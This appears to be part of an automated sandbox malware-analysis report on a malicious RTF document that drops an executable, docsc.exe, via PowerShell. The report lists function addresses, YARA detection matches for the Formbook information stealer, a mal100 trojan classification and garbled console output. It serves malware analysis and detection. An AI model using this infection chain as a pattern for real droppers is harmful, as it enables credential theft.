          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004316B8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00430740
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00435740
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00430048
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004388C8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004338A8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004372A0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00431B48
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00438B58
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_0043DC28
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_0043EC28
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00438CF8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00431491
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00437498
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004314A0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004386A8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004316A8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00430730
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_0043D780
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00661750
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00662EB8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00661968
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00661956
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00661350
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_006613B6
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00661983
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00401030
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041C273
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041BAA2
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00408C5B
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00408C60
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041BC22
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041CC24
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041B4A6
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041BD4F
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041C501
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00402D87
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00402D90
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041BDBD
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041BF3C
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041C7A5
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0075905A
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00743040
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0076D005
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0073E0C6
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007E1238
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0073E2E9
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0078A37B
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00747353
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00742305
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007663DB
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0073F3CF
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0077D47D
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00775485
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00751489
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00786540
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0074351F
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0075C5F0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007E2622
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0074E6C1
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00744680
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007757C3
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0074C7BC
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007C579A
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0076286D
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0074C85C
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007DF8EE
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007C5955
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007569FE
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007429B2
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007E098E
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007F3A83
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00767B00
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0073FBD7
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007CDBDA
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007ECBA4
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0074CD5B
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00770D3B
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007DFDDD
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0075EE4C
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00772E2F
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0076DF7C
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00750F3F
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_002767C7
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00275062
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_002708F9
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00270902
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_002732FF
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00273302
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00271362
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_002775B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_02151238
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020AE2E9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B2305
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B7353
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020FA37B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_021563BF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020AF3CF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020D63DB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020DD005
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B3040
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020C905A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0212D06D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020AE0C6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_02152622
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020FA634
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B4680
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020BE6C1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0213579A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020BC7BC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020E57C3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0213443E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020ED47D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020C1489
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020E5485
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B351F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020F6540
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_021305E3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020CC5F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_02163A83
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020D7B00
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0215CBA4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0213DBDA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020AFBD7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020BC85C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020D286D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0212F8C4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0214F8EE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_02135955
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0213394B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0215098E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B29B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020C69FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020E2E2F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020CEE4C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020C0F3F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020DDF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0214CFB1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_02122FDC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020E0D3B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020BCD5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0214FDDD
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009B4A6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009C7A5
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009CC24
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00088C5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00088C60
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00082D87
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00082D90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00082FB0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: String function: 007AF970 appears 81 times
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: String function: 00783F92 appears 108 times
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: String function: 0078373B appears 238 times
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: String function: 0073E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: String function: 0073DF5C appears 118 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020ADF5C appears 121 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020F373B appears 245 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020F3F92 appears 132 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020AE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0211F970 appears 84 times
          Source: docsc[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: docsc.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2095013575.0000000000210000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
          Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.2097570171.0000000000310000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
          Source: 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
          Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: docsc[1].exe.0.drStatic PE information: Section: U#j;F_` ZLIB complexity 1.00031723159
          Source: docsc.exe.3.drStatic PE information: Section: U#j;F_` ZLIB complexity 1.00031723159
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@20/17@9/10
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$60a1e9_by_Libranalysis.rtf
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBC4C.tmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.......................p.......................`I.........v.....................K......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............+..j......................p.............}..v....(.......0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...`.......0................!`.....6.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............+..j......................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.p.............}..v............0................!`.....".......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............+..j....`.................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j....0%`...............p.............}..v............0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............+..j....`.................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j....0%`...............p.............}..v............0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............+..j....`.................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'..........!`.....H.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............+..j......................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j....0%`...............p.............}..v............0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............+..j......................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.^.....w..................j....0%`...............p.............}..v....@.......0.......................f.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............+..j......................p.............}..v....x.......0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j....0%`...............p.............}..v............0................!`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j......................p.............}..v....@.......0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.^.....................;/.j......`...............p.............}..v.....F......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....F................p.............}..v....HG......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;/.j......`...............p.............}..v.....M......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....N................p.............}..v.....O......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.4.............}..v.... S......0...............x.`.....$.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....S................p.............}..v....XT......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;/.j......`...............p.............}..v.... [......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....[................p.............}..v....X\......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;/.j......`...............p.............}..v.... c......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....c................p.............}..v....Xd......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........x.`.....H.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....j................p.............}..v.....j......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;/.j......`...............p.............}..v....Pq......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....r................p.............}..v.....r......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....v......0...............x.`.....&.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j....Xw................p.............}..v.....w......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;/.j......`...............p.............}..v.....~......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j....X.................p.............}..v............0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............x.`.....<.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j......................p.............}..v....P.......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......;/.j......`...............p.............}..v............0...............x.`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j......................p.............}..v............0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.......................p.......................`I.........v.....................K......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....P.................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0................"}.....6.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j......................p.............}..v....@.......0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.p.............}..v....P.......0................"}.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j.....&}...............p.............}..v....P.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j......................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j.....&}...............p.............}..v....P.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........."}.....H.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j....8.................p.............}..v............0...............X#}.............................
